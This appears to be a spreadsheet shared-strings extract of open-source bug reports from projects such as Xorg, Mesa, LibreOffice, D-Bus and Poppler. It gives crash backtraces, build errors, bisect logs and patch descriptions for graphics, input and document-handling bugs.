  <si>
    <t>SYSTEMD-88705</t>
  </si>
  <si>
    <t>import: add org.freedesktop.import1.policy.in to POTFILES.in</t>
  </si>
  <si>
    <t>Created attachment 112666
import: add org.freedesktop.import1.policy.in to POTFILES.in
Commit 3d7415f43f0fe6a821d7bc4a341ba371e8a30ef3 added a new polkit file. Attached patch adds it to POTFILES.in.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-15783</t>
  </si>
  <si>
    <t>XF86WWW Key broken with cymotion layout</t>
  </si>
  <si>
    <t>Created attachment 16282
fix cymotion layout
Hello
here is a Debian bug report (#462816):
(patch attached)
 &gt; From Andreas Pakulat
It seems like one of the X11 upgrades changed to produce the key code 178
for the XF86WWW key. This maps to symbol I32 and thus using the cymotion
layout I don't get my mapped action for that key anymore. The cymotion
layout currently uses I02 for XF86WWW.
 &gt; From Michael Goth
the following patch for /usr/share/X11/xkb/symbols/inet makes all keys 
work for me. I also deleted one XF86Standby mapping which I couldn't 
produce on my keyboard.
I'm running Sid Linux 2.6.24-1-686 xkb-data 1.1~cvs.20080104.1-1</t>
  </si>
  <si>
    <t>XORG-38012</t>
  </si>
  <si>
    <t>[Arrandale] HP 8440p locks solid on 2.6.39 with 2.14.0+.</t>
  </si>
  <si>
    <t>On my HP 8440p the system locks solid when xorg starts.
This does not happen when running Ubuntu 10.10 with the 2.12.0 driver however it does with the 2.14.0 driver.
This does not happen with 2.6.38 but does with 2.6.39.
There are no logs on the system after the crash nothing gets written to the disk for either the kernel log or the Xorg log.
The git bisect log for this is below however I was unable to complete the bisect because my system will not boot inside the DRI branch which this was bisected to.
If necessary I may be able to work around this with an install on an external drive however that is time consuming enough that it would at best have to wait until next weekend.
Zephaniah E. Loss-Cutler-Hull.
git bisect start
# bad: [61c4f2c81c61f73549928dfd9f3e8f26aa36a8cf] Linux 2.6.39
git bisect bad 61c4f2c81c61f73549928dfd9f3e8f26aa36a8cf
# good: [521cb40b0c44418a4fd36dc633f575813d59a43d] Linux 2.6.38
git bisect good 521cb40b0c44418a4fd36dc633f575813d59a43d
# bad: [0df0914d414a504b975f3cc66ace0c16ef55b7f3] Merge branch 'omap-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tmlind/linux-omap-2.6
git bisect bad 0df0914d414a504b975f3cc66ace0c16ef55b7f3
# good: [6445ced8670f37cfc2c5e24a9de9b413dbfc788d] Merge branch 'staging-next' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/staging-2.6
git bisect good 6445ced8670f37cfc2c5e24a9de9b413dbfc788d
# good: [5a0efea09f42f7c92bd98a38d66b4dff9589266b] sparc64: Sharpen address space randomization calculations.
git bisect good 5a0efea09f42f7c92bd98a38d66b4dff9589266b
# bad: [40c7f2112ce18fa5eb6dc209c50dd0f046790191] Merge branch 'drm-core-next' of git://git.kernel.org/pub/scm/linux/kernel/git/airlied/drm-2.6
git bisect bad 40c7f2112ce18fa5eb6dc209c50dd0f046790191
# bad: [4819d2e4310796c4e9eef674499af9b9caf36b5a] drm: Retry i2c transfer of EDID block after failure
git bisect bad 4819d2e4310796c4e9eef674499af9b9caf36b5a</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-9097</t>
  </si>
  <si>
    <t>br (brazilian) layout variants won't work</t>
  </si>
  <si>
    <t>I'm developing some new variants for the br (brazilian) and found out that the 
current sole variant nodeadkeys was not working.
I managed to fix that and will post a patch.</t>
  </si>
  <si>
    <t>aricaldeira</t>
  </si>
  <si>
    <t>MESA-92660</t>
  </si>
  <si>
    <t>[SKL] random GPU hangs on Steam and Chrome</t>
  </si>
  <si>
    <t>Created attachment 119175
Errorstate chromium hang
System environment:
      -- i7 6700k/HD Graphics 530
      -- x86-64
      -- mesa: 11.1.0-devel (git-48c76ea)
         libdrm: 2.4.65-1
      -- 4.2.3 (no change with 4.3-rc6)
         Flags: i915.reset=0 i915.preliminary_hw_support=1
      -- Linux distribution: Arch
      -- Machine or mobo model: ASUS Z170-A
GPU hangs occasionally on GL applications.
No clear way to reproduce besides opening some GL applications and waiting.</t>
  </si>
  <si>
    <t>nisevoid</t>
  </si>
  <si>
    <t>XORG-96481</t>
  </si>
  <si>
    <t>xf86-input-libinput provides for touchscreen axis labelling no Abs MT Position X</t>
  </si>
  <si>
    <t>Qt5 versions before 5.6.0 are relying on axes existing
labelled Abs MT Position X for touch screens. [48279] [3]
This is currently visible in Debian testing as touch screen
events have no effect on Qt5 based applications when using
the xf86-input-libinput driver.
Other toolkit based applications work as expected.
See Debian bug [826830].
(Got closed as Qt5 version 5.6.1 is already worked on.)
The libinput driver provides: Abs X and Y Rel Horiz Scroll and Vert.
The evdev driver for the same device provides: Abs MT Position X and Y.
Currently I know no other software relying on the MT labelling.
[826830] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=826830
[48279]  https://bugreports.qt.io/browse/QTBUG-48279
[3]      http://code.qt.io/cgit/qt/qtbase.git/commit/src/plugins/platforms/xcb/qxcbconnection_xi2.cpp?id=462f355e4fb16cc7a1838fa2dda0f763eee58c84
#define AXIS_LABEL_PROP_ABS_MT_POSITION_X  Abs MT Position X
#define ABS_MT_POSITION_X	0x35	/* Center X touch position */</t>
  </si>
  <si>
    <t>bernhardu</t>
  </si>
  <si>
    <t>XORG-103722</t>
  </si>
  <si>
    <t>segfault in xf86EdidMonitorSet if first mode of current monitor is deemed to be a duplicate</t>
  </si>
  <si>
    <t>segfault such as the following if the first mode belonging to current monitor is pruned by xf86PruneDuplicateModes(Monitor-&gt;Modes)
[  2857.667] (II) NOUVEAU(0): EDID vendor LEN prod id 16562
[  2857.667] (II) NOUVEAU(0): Printing DDC gathered Modelines:
[  2857.667] (II) NOUVEAU(0): Modeline 1920x1080x0.0  139.00  1920 1980 2028 2050  1080 1090 1100 1130 -hsync -vsync (67.8 kHz eP)
[  2857.667] (II) NOUVEAU(0): Modeline 1920x1080x0.0  115.83  1920 1980 2028 2050  1080 1090 1100 1130 -hsync -vsync (56.5 kHz e)
[  2857.667] (EE) 
[  2857.667] (EE) Backtrace:
[  2857.667] (EE) 0: X (xorg_backtrace+0x41) [0x46dd81]
[  2857.667] (EE) 1: X (0x400000+0x73a59) [0x473a59]
[  2857.667] (EE) 2: /lib/x86_64-linux-gnu/libpthread.so.0 (0x7ff8d619f000+0x11070) [0x7ff8d61b0070]
[  2857.667] (EE) 3: X (xf86EdidMonitorSet+0x273) [0x4c2db3]
[  2857.667] (EE) 4: X (xf86SetDDCproperties+0x34) [0x4d13c4]
[  2857.667] (EE) 5: X (xf86OutputSetEDID+0x22b) [0x4bc2bb]
[  2857.667] (EE) 6: /mnt/bluebild/xorg_170918-173356/xorg-build/lib/xorg/modules/drivers/nouveau_drv.so (0x7ff8d29fa000+0x286bc) [0x7ff8d2a226bc]
[  2857.667] (EE) 7: X (xf86ProbeOutputModes+0x1cd) [0x4bc4cd]
[  2857.668] (EE) 8: X (0x400000+0xc51e7) [0x4c51e7]
[  2857.668] (EE) 9: X (RRGetInfo+0xdb) [0x5007db]
[  2857.668] (EE) 10: X (0x400000+0x92e0c) [0x492e0c]
[  2857.668] (EE) 11: /mnt/bluebild/xorg_170918-173356/xorg-build/lib/xorg/modules/extensions/libglx.so (0x7ff8d4ead000+0x2d15f) [0x7ff8d4eda15f]
[  2857.668] (EE) 12: X (xf86VTEnter+0x80) [0x48b800]
[  2857.668] (EE) 13: X (xf86Wakeup+0x43) [0x48ba13]
[  2857.668] (EE) 14: X (WakeupHandler+0xda) [0x44209a]
[  2857.668] (EE) 15: X (WaitForSomething+0x1ce) [0x4778ae]
[  2857.668] (EE) 16: X (0x400000+0x3d3a1) [0x43d3a1]
[  2857.668] (EE) 17: X (0x400000+0x41558) [0x441558]
[  2857.668] (EE) 18: /lib/x86_64-linux-gnu/libc.so.6 (__libc_start_main+0xf0) [0x7ff8d5e222a0]
[  2857.668] (EE) 19: X (_start+0x2a) [0x42c04a]
[  2857.668] (EE) 
[  2857.668] (EE) Segmentation fault at address 0x139
cause - the following code follows the fwd chain of modes but starts from the one which has just been freed.
simple fix  -  change the line
xf86PruneDuplicateModes(Monitor-&gt;Modes)
to
Monitor-&gt;Modes = xf86PruneDuplicateModes(Monitor-&gt;Modes)</t>
  </si>
  <si>
    <t>johnlumby</t>
  </si>
  <si>
    <t>LIBREOFFICE-78040</t>
  </si>
  <si>
    <t>OLE preview image (SVM) isn't visible when loading document prior to LibreOffice 4.3</t>
  </si>
  <si>
    <t>Created attachment 98132
Test document created using LibreOffice 4.2.4.1
Tested using Windows 8.1 with LibreOffice Version: 4.3.0.0.alpha1+
Build ID: a3c00ee3c7b3b0fbcde32baeb7023c7e8526b908
TinderBox: Win-x86@47-TDF Branch:MASTER Time: 2014-04-28_07:22:55
How to reproduce:
* Open attached test document
Behavior: empty table in document. Only a border is drawn where the content is supposed to be.
If you double click on it and deselect it again content is visible.
How to create document yourself:
* Open new spreadsheet using LibreOffice 4.2 or older (not 4.3)
* Type some numbers in column 1 (lets say just 1 to 5 from A1 to A5)
* Select A1 to A5 and copy (CTRL + C)
* Open new document using same LibreOffice version (4.2 or older)
* Paste in document (CTRL + V)
* Save document (as .odt). You can either close or save the spreadsheet (doesn't matter).
* Open saved document using version 4.3
Regression against 4.2.
This bug is not reproducible if you create the document using 4.3 itself.
Kind regards
Joren</t>
  </si>
  <si>
    <t>LIBREOFFICE-30825</t>
  </si>
  <si>
    <t>LibO 3.3.0beta2 crashes when trying to update extensions where the update feature is not programmed.</t>
  </si>
  <si>
    <t>Platform: Ubuntu 9.10 64 bit Kde windows system.
The bug is reproducible with a fairly recent build.
To reproduce just install the extensions and you got this behavior even though it seems they don't have update enabled.
1) Install Libo I installed it from deb packages as standard it ended up in /opt/libreoffice3 installed extension packages as well.
2) installed some of my extension as well.
3) trying an update just to test.
4) LibO chrashed.
5) removed all the extensions but mine (they have update enabled as well): no crashes.
6) did a fake update of one of my extensions trying to update: no problem there no crashed and extension updated.
Commecting with gdb and after a crash I got this bt:
0x00007f1238908048 in ?? () from /opt/libreoffice3/program/../basis-link/program/libunoxmllx.so
(gdb) bt
#0  0x00007f1238908048 in ?? () from /opt/libreoffice3/program/../basis-link/program/libunoxmllx.so
#1  0x00007f12389076e4 in ?? () from /opt/libreoffice3/program/../basis-link/program/libunoxmllx.so
#2  0x00007f1238907671 in ?? () from /opt/libreoffice3/program/../basis-link/program/libunoxmllx.so
#3  0x00007f123627dba7 in ?? () from /opt/libreoffice3/program/../basis-link/program/updatefeed.uno.so
#4  0x00007f1236281133 in ?? () from /opt/libreoffice3/program/../basis-link/program/updatefeed.uno.so
#5  0x00007f123627d43e in ?? () from /opt/libreoffice3/program/../basis-link/program/updatefeed.uno.so
#6  0x00007f1257811232 in ?? () from /opt/libreoffice3/program/../basis-link/program/libdeploymentmisclx.so
#7  0x00007f125781148f in ?? () from /opt/libreoffice3/program/../basis-link/program/libdeploymentmisclx.so
#8  0x00007f1257812add in dp_misc::getOnlineUpdateInfos(com::sun::star::uno::Reference const&amp; com::sun::star::uno::Reference const&amp; com::sun::star::uno::Reference const&amp; std::vector std::allocator &gt; &gt; const* std::vector com::sun::star::uno::Any&gt; std::allocator com::sun::star::uno::Any&gt; &gt; &gt;&amp;) () from /opt/libreoffice3/program/../basis-link/program/libdeploymentmisclx.so
#9  0x00007f123867b54d in ?? () from /opt/libreoffice3/program/../basis-link/program/deploymentguilx.uno.so
#10 0x00007f123867115e in ?? () from /opt/libreoffice3/program/../basis-link/program/deploymentguilx.uno.so
#11 0x00007f12386713fa in ?? () from /opt/libreoffice3/program/../basis-link/program/deploymentguilx.uno.so
#12 0x00007f125999ca5c in ?? () from /opt/libreoffice3/program/../basis-link/ure-link/lib/libuno_sal.so.3
#13 0x00007f1258275a04 in start_thread () from /lib/libpthread.so.0
#14 0x00007f125876ed4d in clone () from /lib/libc.so.6
#15 0x0000000000000000 in ?? ()
(gdb) cont
So a question.
What flags should I use to enable a build with minimal symbol generation in order to have a more meaningful trace?
I mean minimal not full symbols.
After the 'gdb cont' above the Kde crash reporter is started and reports OpenOffice.org as chashed may be LibreOffice there is better?
Should be somewhere in soffice.bin hard to find.</t>
  </si>
  <si>
    <t>giuseppe.castagno</t>
  </si>
  <si>
    <t>XORG-9803</t>
  </si>
  <si>
    <t>Input/elographics</t>
  </si>
  <si>
    <t>elographics divide by zero crasher</t>
  </si>
  <si>
    <t>By accident we ended up using these values for the elographics input driver:
   Option  MaxX 4050
   Option  MinX 4051
   Option  MinY 3973
   Option  MaxY 3973
With these values X crashes when you touch the screen:
Program received signal SIGFPE Arithmetic exception.
0x00002b6f559946f0 in xf86EloConvert (local=0x80dea0 
    first= num= v0=2886 v1=1618 
    v2=0 v3=0 v4=0 v5=0 x=0x7fff5764525c y=0x7fff57645258)
    at xf86Elo.c:736
736       *y = (priv-&gt;screen_height -
(gdb) bt 
#0  0x00002b6f559946f0 in xf86EloConvert (local=0x80dea0 
    first= num= v0=2886 v1=1618 
    v2=0 v3=0 v4=0 v5=0 x=0x7fff5764525c y=0x7fff57645258)
    at xf86Elo.c:736
#1  0x00002b6f55995a29 in xf86EloReadInput (local=0x80dea0) at xf86Elo.c:846
#2  0x0000000000490c6f in xf86AddEnabledDevice ()
#3  0x000000000046af2f in xf86InstallSIGIOHandler ()
#4  0x00002b6f53db35d0 in killpg () from /lib/libc.so.6
#5  0x0000000000000000 in ?? ()
The line of code in question:
  *y = (priv-&gt;screen_height -
	(priv-&gt;screen_height * (input_y - priv-&gt;min_y)) / height)
In this case height is 0.</t>
  </si>
  <si>
    <t>ddrake</t>
  </si>
  <si>
    <t>MESA-93257</t>
  </si>
  <si>
    <t>[SKL bisected] ASTC dEQP tests segfault</t>
  </si>
  <si>
    <t>Test: dEQP-GLES3.functional.texture.compressed.astc.void_extent_ldr.5x4 
Expected result: Test fails due to comparison errors.
Actual result:   Test segfaults.
The segfaults seem to occur for all ASTC tests with block size dimensions &gt;= 5x4.
More tests may be affected. This issue does not occur on Jenkins but it does occur
locally on the given configuration:
HW: SKL
dEQP: https://github.com/chadversary/deqp chadv
      CMAKE_BUILD_TYPE Debug                                         
      DEQP_TARGET      drm
Mesa:
commit 0288f92e7b0ce5f0d821f2d0ddef522a23776ecb
Author: Ben Widawsky 
Date:   Tue Oct 13 20:50:27 2015 -0700
    i965/gen9: Support fast clears for 32b float
    SKL supports the ability to do fast clears and resolves of 32b RGBA as both
    integer and floats. This patch only enables float color clears because we
    haven't yet enabled integer color clears (HW support for that was added in
    BDW).
    v2: Remove LUMINANCE16F and INTENSITY16F special cases since they are now
    handled by Neil's patch to disable MSAA fast clears.
    Signed-off-by: Ben Widawsky 
    Reviewed-by: Neil Roberts 
    Reviewed-by: Chad Versace 
Core dump info:
        Signal: 11 (SEGV)
  Command Line: ./modules/gles3/deqp-gles3 --deqp-case=dEQP-GLES3.functional.texture.compressed.astc.void_extent_ldr.5x4 --deqp-surface-type=fbo --deqp-log-images=disable --deqp-surface-width=64 --deqp-surface-height=64
   Stack trace:
   #0  0x00007fa3556059b9 dri2InvalidateDrawable (i965_dri.so)
   #1  0x00007fa3556222dc intel_viewport (i965_dri.so)
   #2  0x00007fa355372ace _mesa_set_viewport (i965_dri.so)
   #3  0x00007fa35547e7a8 _mesa_meta_end (i965_dri.so)
   #4  0x00007fa35562fa40 brw_meta_resolve_color (i965_dri.so)
   #5  0x00007fa355680bdd intel_miptree_resolve_color (i965_dri.so)
   #6  0x00007fa355685ee2 intel_readpixels_tiled_memcpy (i965_dri.so)
   #7  0x00007fa35568637b intelReadPixels (i965_dri.so)
   #8  0x00007fa355317716 _mesa_ReadnPixelsARB (i965_dri.so)
   #9  0x00007fa355317767 _mesa_ReadPixels (i965_dri.so)
   #10 0x00007fa358127640 shared_dispatch_stub_256 (libglapi.so.0)
   #11 0x00000000010343eb _ZN3glu10readPixelsERKNS_13RenderContextEiiRKN3tcu17PixelBufferAccessE (deqp-gles3)
   #12 0x0000000000c6772f _ZN4deqp5gles310Functional29ASTCDecompressionCaseInternal14ASTCRenderer2D6renderERN3tcu7SurfaceES6_RKN3glu9Texture2DERKNS4_13TextureFormatE (deqp-gles3)
   #13 0x0000000000c6839f _ZN4deqp5gles310Functional15ASTCBlockCase2D7iterateEv (deqp-gles3)
   #14 0x0000000000feab6b _ZN3tcu15TestCaseWrapper15iterateTestCaseEPNS_8TestCaseE (deqp-gles3)
   #15 0x0000000000aacb9f _ZN4deqp5gles315TestCaseWrapper15iterateTestCaseEPN3tcu8TestCaseE (deqp-gles3)
   #16 0x0000000000fec6cd _ZN3tcu12TestExecutor7iterateEv (deqp-gles3)
   #17 0x0000000000fc31e7 _ZN3tcu3App7iterateEv (deqp-gles3)
   #18 0x0000000000aa92d9 main (deqp-gles3)
   #19 0x00007fa3583a0610 __libc_start_main (libc.so.6)
   #20 0x0000000000aa90c9 _start (deqp-gles3)</t>
  </si>
  <si>
    <t>XORG-3050</t>
  </si>
  <si>
    <t>BadLength error when running glitz apps on top of software Mesa</t>
  </si>
  <si>
    <t>To reproduce with Mesa as of 20050417: 
DISPLAY=127.0.0.1:1 LIBGL_ALWAYS_INDIRECT=1 Xglx :2 
This creates a window but it immediately disappears and the following error 
message is printed: 
Visual: 0x0 (n) - r/g/b/a: 8/8/8/8  db: 1 
Initialized 800x600 back buffer offscreen area 
X Error of failed request:  BadLength (poly request too large or internal Xlib 
length error) 
  Major opcode of failed request:  146 (GLX) 
  Minor opcode of failed request:  1 (X_GLXRender) 
  Serial number of failed request:  85 
  Current serial number in output stream:  86</t>
  </si>
  <si>
    <t>XORG-42890</t>
  </si>
  <si>
    <t>Corruptions in gimp's image window [SNA]</t>
  </si>
  <si>
    <t>Created attachment 53491
foto opened but previously opend picture shown in place of the foto
I am experiencing rendering artifacts when using gimp in particular its iamge view window - with SNA enabled.
1. On the screenshot attached I opened a foto using gimp however gimp is only showing a part of the image - instead it shows a picture which has been open before but already closed (screenshot of wine).
2. Another bug I experienced was broken re-paint of the image-window.
- Select area of the image
- Copy the area (Ctrl + C)
- Create a new image (Ctrl + V)
-&gt; Corruptions in both image windows.</t>
  </si>
  <si>
    <t>LIBREOFFICE-65632</t>
  </si>
  <si>
    <t>FILEOPEN RTF Don't/slow open rtf files when Record Changes is activated</t>
  </si>
  <si>
    <t>Created attachment 80652
rtf file with activated record changes
When I try to open the attached file the file didn't open. The progress bar show that LibreOffice load the file and it opened after aprox 10 minutes. The documents contains only 1-5 pages.
I try it in Ubuntu with LibreOffice 4.0.2.2 and in windows with LO 4.0.3.3 and 3.6.4.3 with the same results.</t>
  </si>
  <si>
    <t>POPPLER-63963</t>
  </si>
  <si>
    <t>pdftops - some fonts are encoded incorrectly in level2 postscript</t>
  </si>
  <si>
    <t>Created attachment 78523
test.pdf - original pdf file
Hi team 
This sample PDF file when converted to PS level2 by pdftops 0.22.3 cannot be processed by a printer or by GhostScript interpreter because it chokes on embedded fonts and quits with rangecheck error in xyshow function. 
The offending part of PS code is this:
/F9_0 13.3333 Tf
(\012\355)
[13.3333
0] Tj
Nice folks at GhostScript explained to me that after defining the type42 font /DejaVuSans_00 the ps code then does this:
16 dict begin
/FontName /DejaVuSans def
/FontType 0 def
/FontMatrix [1 0 0 1 0 0] def
/FMapType 2 def
/Encoding [
0
] def
/FDepVector [
/DejaVuSans_00 findfont
] def
FontName currentdict end definefont pop
As you can see the font has a single dependent font and it has map
type 2. Map type 2 means the () string passed to show has a font number
and a character number.  So the string (\012\355) means sub-font 10
character 247 hence the rangecheck error.
In the PDF all of the falls to F0 (Arial) are of the form:
/F0 13.3333 Tf
1 0 0 -1 10 18 Tm
 Tj
but the calls to F1 (DejaVu Sans) look like:
/F1 13.3333 Tf
1 0 0 -1 139 18 Tm
 Tj
So pdftops is copying the  literally to (\012\355) but not
embedding enough subfonts.  The other fonts coincidentally all use
glyphs in -- and miss the bug.
I'm attaching both PDF and PS files for your consideration.</t>
  </si>
  <si>
    <t>DBUS-22888</t>
  </si>
  <si>
    <t>compile issues on OSX in current master (HEAD)</t>
  </si>
  <si>
    <t>Created attachment 27913
check for unix FD passing
On OSX building current master I get:
libtool: compile:  gcc-4.2 -DHAVE_CONFIG_H -I. -I/Users/ranger/rcs/dbus/dbus -I.. -I.. -I/Users/ranger/rcs/dbus -fPIC -DDBUS_COMPILATION -DDBUS_MACHINE_UUID_FILE=\/sw/var/lib/dbus/machine-id\ -DDBUS_SYSTEM_CONFIG_FILE=\/sw/etc/dbus-1/system.conf\ -DDBUS_SESSION_CONFIG_FILE=\/sw/etc/dbus-1/session.conf\ -g -O2 -Wall -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes -Wnested-externs -Wpointer-arith -Wcast-align -Wdeclaration-after-statement -fno-common -Wno-unused -Wno-sign-compare -Wno-pointer-sign -Wno-format -fno-strict-aliasing -MT dbus-message.lo -MD -MP -MF .deps/dbus-message.Tpo -c /Users/ranger/rcs/dbus/dbus/dbus-message.c  -fno-common -DPIC -o .libs/dbus-message.o
/Users/ranger/rcs/dbus/dbus/dbus-message.c: In function â€˜dbus_message_contains_unix_fdsâ€™:
/Users/ranger/rcs/dbus/dbus/dbus-message.c:3633: error: â€˜DBusMessageâ€™ has no member named â€˜n_unix_fdsâ€™
...if I fix that I then get:
libtool: compile:  gcc-4.2 -DHAVE_CONFIG_H -I. -I/Users/ranger/rcs/dbus/dbus -I.. -I.. -I/Users/ranger/rcs/dbus -fPIC -DDBUS_COMPILATION -DDBUS_MACHINE_UUID_FILE=\/sw/var/lib/dbus/machine-id\ -DDBUS_SYSTEM_CONFIG_FILE=\/sw/etc/dbus-1/system.conf\ -DDBUS_SESSION_CONFIG_FILE=\/sw/etc/dbus-1/session.conf\ -g -O2 -Wall -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes -Wnested-externs -Wpointer-arith -Wcast-align -Wdeclaration-after-statement -fno-common -Wno-unused -Wno-sign-compare -Wno-pointer-sign -Wno-format -fno-strict-aliasing -MT dbus-sysdeps-unix.lo -MD -MP -MF .deps/dbus-sysdeps-unix.Tpo -c /Users/ranger/rcs/dbus/dbus/dbus-sysdeps-unix.c  -fno-common -DPIC -o .libs/dbus-sysdeps-unix.o
/Users/ranger/rcs/dbus/dbus/dbus-sysdeps-unix.c: In function â€˜_dbus_dupâ€™:
/Users/ranger/rcs/dbus/dbus/dbus-sysdeps-unix.c:3047: error: â€˜cloexec_doneâ€™ undeclared (first use in this function)
/Users/ranger/rcs/dbus/dbus/dbus-sysdeps-unix.c:3047: error: (Each undeclared identifier is reported only once
/Users/ranger/rcs/dbus/dbus/dbus-sysdeps-unix.c:3047: error: for each function it appears in.)
For the first it looks like it just needs to be surrounded by a check for HAVE_UNIX_FD_PASSING for the latter it appears the #ifndef should be an #ifdef instead?
I've attached 2 patches for these issues.  master builds with these changes for me.</t>
  </si>
  <si>
    <t>thiago</t>
  </si>
  <si>
    <t>XORG-13872</t>
  </si>
  <si>
    <t>TV-Out show bright white colors as black/white noise</t>
  </si>
  <si>
    <t>Hello
when using the tv-out of my VGA compatible controller: ATI Technologies Inc RV350 [Mobility Radeon 9600 M10] it works quite good (much better than the previously used VGAComposite adapter). This is true apart from a strange distortion.
Some white very bright areas show garbage - it looks like static you get when no station is tuned in. I tried to take a picture that I attached to this report - it's not too good but I put strokes around the relevant areas. The noise I describe is visible at the top of the buttons.
Greetings
Matthias</t>
  </si>
  <si>
    <t>XORG-13620</t>
  </si>
  <si>
    <t>radeonhd: panel dithering unacceptable</t>
  </si>
  <si>
    <t>I am using the current git tree of the radeonhd driver with a Radeon Mobility X1400 and the picture output I get is quite speckled especially when yellow's displayed.  This is especially noticeable on tooltips and Epiphany's address bar when I browse HTTPS sites.  The background is not steady yellow but has darker spots in it on tooltips it's looking like more dark-yellow space than light yellow spots.  The disturbed background is a bit irritating when one looks at it which is why I report it i.e. the text on the yellow background gets harder to read.
Those spots are only visible on the display output (LCD) but not on screenshots.  With fglrx the picture is fine.</t>
  </si>
  <si>
    <t>pkern</t>
  </si>
  <si>
    <t>DRI-101234</t>
  </si>
  <si>
    <t>[BAT][CTG] (gem_mmap_gtt:3095) Failed assertion: memcmp(ptr  linear_pattern PAGE_SIZE) == 0</t>
  </si>
  <si>
    <t>Ever since we swapped fi-ctg-l9400 for another one (https://bugs.freedesktop.org/show_bug.cgi?id=101089) we started randomly hitting an assert when running igt@gem_mmap_gtt@basic-small-bo-tiledx:
(gem_mmap_gtt:3095) CRITICAL: Test assertion failure function test_huge_bo file gem_mmap_gtt.c:518:
(gem_mmap_gtt:3095) CRITICAL: Failed assertion: memcmp(ptr  linear_pattern PAGE_SIZE) == 0
Subtest basic-small-bo-tiledX failed.
**** DEBUG ****
(gem_mmap_gtt:3095) intel-chipset-DEBUG: Test requirement passed: pci_dev
(gem_mmap_gtt:3095) intel-os-DEBUG: Checking 1 surfaces of size 134217728 bytes (total 134221824) against RAM
(gem_mmap_gtt:3095) drmtest-DEBUG: Test requirement passed: !(fd&lt;0)
(gem_mmap_gtt:3095) igt-debugfs-DEBUG: Opening debugfs directory '/sys/kernel/debug/dri/0'
(gem_mmap_gtt:3095) intel-os-DEBUG: Test requirement passed: __intel_check_memory(count size mode &amp;required &amp;total)
(gem_mmap_gtt:3095) igt-core-DEBUG: Test requirement passed: !igt_run_in_simulation()
(gem_mmap_gtt:3095) DEBUG: Test requirement passed: __gem_set_tiling(fd bo tiling pitch) == 0
(gem_mmap_gtt:3095) DEBUG: Test requirement passed: __gem_set_tiling(fd bo tiling pitch) == 0
(gem_mmap_gtt:3095) DEBUG: Test requirement passed: ptr
(gem_mmap_gtt:3095) CRITICAL: Test assertion failure function test_huge_bo file gem_mmap_gtt.c:518:
(gem_mmap_gtt:3095) CRITICAL: Failed assertion: memcmp(ptr  linear_pattern PAGE_SIZE) == 0
****  END  ****
So far it has happened 4 out of the 5 runs of the new machine.
Full logs: https://intel-gfx-ci.01.org/CI/CI_DRM_2671/fi-ctg-l9400/igt@gem_mmap_gtt@basic-small-bo-tiledx.html</t>
  </si>
  <si>
    <t>PLYMOUTH-18482</t>
  </si>
  <si>
    <t>plymouth should work better in multihead setups</t>
  </si>
  <si>
    <t>Right now we use whatever mode is available when we're started and just go with it.
We really should probably use libdrm directly and then we can do smarter things with multihead.</t>
  </si>
  <si>
    <t>CUPS-PK-HELPER-45486</t>
  </si>
  <si>
    <t>Configuration misses gio-unix-2.0 requirement</t>
  </si>
  <si>
    <t>Created attachment 56434
add the check
When compiling cups-pk-helper on Fedora 16 it misses check for gio-unix-2.0 &gt;= $GIO_REQUIRED. As a consequence it fails to build with:
cph-iface-mechanism.c:14:31: fatal error: gio/gunixfdlist.h: No such file or directory
compilation terminated.
distcc[20188] ERROR: compile cph-iface-mechanism.c on localhost failed
make[3]: *** [cups_pk_helper_mechanism-cph-iface-mechanism.o] Error 1
make[3]: *** Waiting for unfinished jobs....
cph-iface-mechanism.c:14:31: fatal error: gio/gunixfdlist.h: No such file or directory
compilation terminated.
Attached patch fixes this.
Marek</t>
  </si>
  <si>
    <t>MESA-102623</t>
  </si>
  <si>
    <t>[OpenGL CTS] KHR-GL45.enhanced_layouts.varying_block_automatic_member_locations fails</t>
  </si>
  <si>
    <t>Hardware: Broadwell or Skylake
Mesa commit: 44ac54a3fdc
vk-gl-cts commit: dfcb8e870438
Test KHR-GL45.enhanced_layouts.varying_block_automatic_member_locations fails
Unexpected success</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-11815</t>
  </si>
  <si>
    <t>new account for xf86-video-amd</t>
  </si>
  <si>
    <t>As instructed by Jordan Crouse I am hereby requesting an account to work on the xf86-video-amd branch.
Account: q-funk
Real name: Martin-Ã‰ric Racine
E-mail: account at iki.fi</t>
  </si>
  <si>
    <t>MESA-95203</t>
  </si>
  <si>
    <t>Tonga GST/OMX/VCE encode broken since mesa: st/omx: Fix resource leak on OMX_ErrorNone</t>
  </si>
  <si>
    <t>Created attachment 123343
gst-omx vce failing and working
AMD Tonga since mesa commit -
commit b87856d25d1be1953dea30814994fc40cac5e573
Author: Robert Foss 
Date:   Thu Apr 21 17:49:20 2016 -0400
    st/omx: Fix resource leak on OMX_ErrorNone
    Avoid leaking buffer allocated for task if an error has occured.
    Coverity id: 1213929
    Signed-off-by: Robert Foss 
    Reviewed-by: Emil Velikov 
I can't encode with gst/omx/vce. It just hangs doing nothing and when I  c it it throws some errors and quits.
Attached is the output I see from failing followed by working with above commit reverted.</t>
  </si>
  <si>
    <t>XORG-8085</t>
  </si>
  <si>
    <t>gconf plugin breaks action options by writing but not reading them as a single entity</t>
  </si>
  <si>
    <t>The most-often encountered manifestation of this bug is this:
If you change the setting of both the key and the edge activating an action the
edge setting is reset to the default (the value set up during the initialization
of the corresponding plugin) when compiz restarts.
This bug has been discussed in several topics of compiz.net forums because it
manifests itself by breaking settings of several plugins. One of the discussions
(http://www.compiz.net/topic-2091-1.html) contains steps to reproduce the bug
with the scale plugin (http://www.compiz.net/viewtopic.php?pid=28158#p28158).
The bug has been reported analyzed and two solutions (a long-term one and a
transitional one) has been proposed in compiz.net bugtracker at
http://bugs.compiz.net/view.php?id=44 . A copy some bits from there follows:
________
ulph's analysis of the issue:
When gconfInitOption is called for an option of type CompOptionTypeAction there
are four calls to gconfGetOptionValue with the entries for key button bell and
edge (in that order). Suppose gconfGetOptionValue is called for the key entry
and that the key entry is set in gconf. Now gconfGetOptionValue will locate the
data structure for the action. This data structure holds the configuration for
both key button bell and edge. Next gconfGetOptionValue will update the data
structure to reflect the key configuration for that action. Finally it will call
gconfSetDisplayOptionForPlugin that will notify the plugin of the change and
write back the action to gconf with gconfSetOption. Since gconfSetOption writes
back the entire action data structure to gconf the button bell and edge keys
that haven't been read into our action data structure yet will be overwritten.
________
